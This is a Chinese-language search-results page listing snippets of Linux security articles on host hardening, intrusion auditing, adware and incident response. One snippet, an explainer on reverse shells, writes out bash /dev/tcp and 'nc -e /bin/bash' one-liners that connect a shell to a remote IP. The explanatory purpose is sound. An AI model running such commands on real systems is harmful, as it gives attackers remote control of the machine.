首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

等级保护主机安全:CentOS入侵防范(一)

一、说明 本篇文章主要想说一说我对入侵防范中前3个测评项的理解(对于centos系统而言),如果大家有其他的看法或者思路也可以在回复中提出,我也跟着学习学习。...查询linux中安装的程序,一般使用yum list installed或者rpm -qa,关键是linux中随随便便都安装得有几百个组件,而且很多组件都是存在着依赖关系。...至于高危端口,实际上某种意义上所有端口都是高危端口,反正只要你监听了,都有可能被入侵。 所以对于必须要使用的端口,比如22端口,最好的就是限制连接这个端口的ip,其次,就是修改默认端口。...[root@centos01 ~]# ldd /usr/sbin/sshd linux-vdso.so.1 => (0x00007fffa0da0000) libfipscheck.so.1...入侵防范的剩余测评项,也到下篇文章一起说。 *本文原创作者:起于凡而非于凡,本文属于FreeBuf原创奖励计划,未经许可禁止转载 ?

1.2K20
您找到你想要的搜索结果了吗?
是的
没有找到

Linux入侵小结

0x00 审计命令 在linux中有5个用于审计的命令: last:这个命令可用于查看我们系统的成功登录、关机、重启等情况;这个命令就是将/var/log/wtmp文件格式化输出。...last -x reboot 只针对登录 使用-d参数,并且参数后不用跟任何选项 last -d 显示错误的登录信息 lastb 查看当前登录情况 who、w 0x01 日志查看 在Linux...(utmp、wtmp日志文件是多数Linux日志子系统的关键,它保存了用户登录进入和退出的记录。...0x02 用户查看 Linux不同的用户,有不同的操作权限,但是所有用户都会在/etc/passwd /etc/shadow /etc/group /etc/group- 文件中记录; 查看详细 注:linux...*:查看cron文件是变化的详细 ls /var/spool/cron/ 检查后门 对于linux的后门检查,网络上有一些公开的工具,但是在不使用这些工具的前提时,我们可以通过一些命令来获取一些信息。

2K20

流氓软件原理及防范

本人不擅长表述,本章以问答形式进行 1.我该怎么去寻找需要的软件?...我在这里实机下载了一个流氓软件,大概演示一下,你就知道了 下载软件注意事项: 1.首先我要下载一个叫 spacesnife 的磁盘扫描软件,于是 百度了以下,看也没看,直接点击第一条搜索结果,于是...(1和3 :软件信息字体颜色一致,默认打勾,难以分辨,一旦忽略,会自动后台下载,一般出现在安装页面和安装结束页面,流氓的根源 2、软件安装位置,大多数软件都可以自定义安装位置,但是藏得比较隐蔽,这个还算正常...,流氓都是小意思啦, 谨慎和畏惧是两码事,千万不要产生畏惧心理 总结: 仔细,仔细,仔细 由于国家信息安全法的要求,软件在安装过程中不允许私自捆绑软件,绝大多数软件提供方也遵循这一约束,明确告知用户,但是用什么方式告知用户那就不一定了...,手机软件启动页,平台广告,软件下载安装等等,流氓无处不在,但流氓也必须遵循原则,一切还是看用户自己 仔细,仔细,仔细 版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。

43510

Linux入侵 反弹shell

二.命令 Bash反弹shell的实现: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 看到这短短的一行代码,正在复习Linux,自我感觉良好的我顿时充满了挫败感,这都是些什么鬼.../dev/tcp/是Linux中的一个特殊设备,打开这个文件就相当于发出了一个socket调用,建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。...同理,Linux中还存在/dev/udp/。 要想了解“>&”和“0>&1”,首先我们要先了解一下Linux文件描述符和重定向。 linux shell下常用的文件描述符是: 1....三.NetCat 如果目标主机支持“-e”选项的话,我们就可以直接用 nc -e /bin/bash 10.42.0.1 1234 但当不支持时,我们就要用到Linux神奇的管道了。

6.1K30

linux入侵排查步骤

Linux入侵排查步骤 一:查看异常的进程 a、查看cpu占用最多的进程 运行top命令 交互式P键会根据CPU的占用大小进行排序 有的时候会遇到top之后cpu显示特别的低,但是服务器还特别的卡.../lastlog Last 列出截止目前登录过系统的用户信息 W 查看当前的登录账号信息 可以通过/var/log/secure文件 查看登录成功、失败等信息 六:查看最近一段时间被修改的文件 查找入侵时间点修改的文件...b、/etc/systemd/system/multi-user.target.wants 是否有服务的软连接 c、可以先kill -STOP $id 先禁止然后在进行排查 服务器要做好安全加固避免被入侵...a、定期安装系统补丁 b、安全组仅对外开放业务端口 c、定期做镜像、快照备份 d、不要安装来源不明软件 e、使用含有数字、大小写字母、特殊符号的密码

1.3K40

Linux手工入侵排查思路

Linux主机发生安全事件需要进行入侵排查时,一般可以使用常见的shell命令,通过分析主机的异常现象、进程端口、启动方式、可疑文件和日志记录等信息以确认主机是否被入侵。...在这里,结合工作中Linux安全事件分析处理办法,总结了Linux手工入侵排查过程中的分析方法。...---- 01、检查系统账号 从攻击者的角度来说,入侵者在入侵成功后,往往会留下后门以便再次访问被入侵的系统,而创建系统账号是一种比较常见的后门方式。...在做入侵排查的时候,用户配置文件/etc/passwd和密码配置文件/etc/shadow是需要去重点关注的地方。...查看该进程启动时的完整环境变量: strings -f /proc/1461/environ | cut -f2 -d '' 列出该进程所打开的所有文件: lsof -p $PID 04、检查系统服务 Linux

1.5K40

【应急响应】Linux入侵排查思路

0x00 前言 当企业发生黑客入侵、系统崩溃或其它影响业务正常运行的安全事件时,急需第一时间进行处理,使企业的网络信息系统在最短时间内恢复正常工作,进一步查找入侵来源,还原入侵事故过程...,同时给出解决方案与防范措施,为企业挽回或减少经济损失。...针对常见的攻击事件,结合工作中应急响应事件分析和解决的方法,总结了一些Linux服务器入侵排查的思路。...网站后门检测工具:http://edr.sangfor.com.cn/backdoor_detection.html 四、RPM check检查 系统完整性可以通过rpm自带的-Va来校验检查所有的rpm软件包...文件的属组是否改变 T 文件的修改时间是否改变 如果命令被替换了,如何去还原回来: 文件提取还原过程: rpm -qf /bin/ls 查询ls命令属于哪个软件

2.5K31
领券